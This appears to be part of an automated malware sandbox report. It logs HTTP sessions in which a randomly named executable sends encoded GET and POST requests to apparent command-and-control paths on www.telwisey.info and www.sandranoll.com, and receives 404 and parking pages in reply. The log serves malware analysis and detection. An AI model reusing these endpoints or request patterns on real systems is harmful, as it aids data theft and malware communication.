Aug 29, 2024 05:25:44.679240942 CEST	1236	IN	Data Raw: 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 Data Ascii: none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="200.67" cy="176.313" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-
Aug 29, 2024 05:25:44.679254055 CEST	1236	IN	Data Raw: 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 Data Ascii: cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)"> <path id="cord" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-li
Aug 29, 2024 05:25:44.679269075 CEST	1236	IN	Data Raw: 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 Data Ascii: " stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g> <g id="armR"> <path fill="#FFF
Aug 29, 2024 05:25:44.686290026 CEST	1236	IN	Data Raw: 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09 63 33 2e 38 32 39 2c 36 2e 36 36 34 2c 31 32 Data Ascii: ,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	199.192.19.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:46.529239893 CEST	503	OUT	GET /ei85/?kbRxoVY0=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&DnUL=_290s HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.telwisey.info Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:25:47.174886942 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:47 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 29, 2024 05:25:47.174907923 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
Aug 29, 2024 05:25:47.174926996 CEST	1236	IN	Data Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
Aug 29, 2024 05:25:47.174938917 CEST	1236	IN	Data Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
Aug 29, 2024 05:25:47.174952030 CEST	896	IN	Data Raw: 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c Data Ascii: 386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /
Aug 29, 2024 05:25:47.174963951 CEST	1236	IN	Data Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
Aug 29, 2024 05:25:47.174977064 CEST	1236	IN	Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
Aug 29, 2024 05:25:47.174995899 CEST	448	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
Aug 29, 2024 05:25:47.175048113 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <
Aug 29, 2024 05:25:47.175062895 CEST	224	IN	Data Raw: 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 Data Ascii: l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
Aug 29, 2024 05:25:47.179833889 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-mite

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	213.145.228.16	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:52.394222975 CEST	778	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 37 68 58 78 32 47 39 37 73 75 74 49 59 6b 2f 4b 55 2f 4c 38 77 46 4e 2f 70 75 39 56 58 37 2f 69 51 3d 3d Data Ascii: kbRxoVY0=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl67hXx2G97sutIYk/KU/L8wFN/pu9VX7/iQ==
Aug 29, 2024 05:25:53.110794067 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:52 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 34 34 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED] Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c44Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
Aug 29, 2024 05:25:53.110893011 CEST	1236	IN	Data Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><tab
Aug 29, 2024 05:25:53.110905886 CEST	1154	IN	Data Raw: 74 72 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 47 72 61 74 69 73 20 42 61 73 69 73 20 48 6f 73 74 69 6e 67 20 66 26 75 75 6d 6c 3b 72 20 49 68 72 65 20 44 6f 6d 61 69 Data Ascii: tr><tr><td><table><tr><td colspan="2"><h2>Gratis Basis Hosting für Ihre Domain</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosti
Aug 29, 2024 05:25:53.114109993 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	213.145.228.16	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:54.939290047 CEST	798	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 68 2b 69 75 6e 4a 59 55 47 32 35 56 71 77 38 4b 4c 6b 2b 69 4e 53 61 33 51 58 4a 42 42 30 4b 41 49 3d Data Ascii: kbRxoVY0=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwh+iunJYUG25Vqw8KLk+iNSa3QXJBB0KAI=
Aug 29, 2024 05:25:55.627763987 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:55 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 29, 2024 05:25:55.627784014 CEST	224	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">8c0
Aug 29, 2024 05:25:55.627794981 CEST	1236	IN	Data Raw: 0a 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 57 6f 72 64 50 72 65 73 73 20 42 6c 6f 67 20 53 6f 66 74 77 61 72 65 20 66 26 75 75 6d 6c 3b 72 20 49 68 Data Ascii: <table><tr><td><table><tr><td colspan="2"><h2>WordPress Blog Software für Ihr Hosting Paket.</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/h
Aug 29, 2024 05:25:55.627809048 CEST	1007	IN	Data Raw: 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 66 69 6c 65 61 64 6d 69 6e 2f 67 66 78 2f 69 63 6f 6e 73 2f 63 70 2f 36 Data Ascii: style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mail.png" alt="E-Mail" /></td><td style="width:300px;">Sie benötigen nur E-Mail-Adressen? Kein Problem! Domaintechnik.at bietet Ihnen drei verschiedene
Aug 29, 2024 05:25:55.631386042 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	213.145.228.16	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:57.531994104 CEST	10880	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 36 53 4d 61 6f 76 42 30 2b 2f 33 6d 68 68 31 4d 36 7a 55 6e 4b 50 79 55 6d 71 79 4b 62 63 69 41 4a 46 53 77 42 42 51 44 68 48 58 47 71 30 53 53 48 44 71 62 4a 64 41 73 31 59 78 53 51 6a 74 32 78 4d 4c 6f 71 35 75 6c 36 54 73 62 37 44 4e 45 74 6e 4b 58 62 38 68 72 50 54 4a 35 61 75 45 4c 46 52 31 6c 32 6e 48 55 62 52 66 2b 37 54 56 76 42 4a 38 35 78 2f 4c 58 6b 6e 4f 52 41 4b 63 38 75 73 51 42 32 6d 79 36 6a 42 33 4f 4f 6d 41 6d 65 77 51 75 34 36 39 5a 73 63 50 47 78 43 46 [TRUNCATED] Data Ascii: 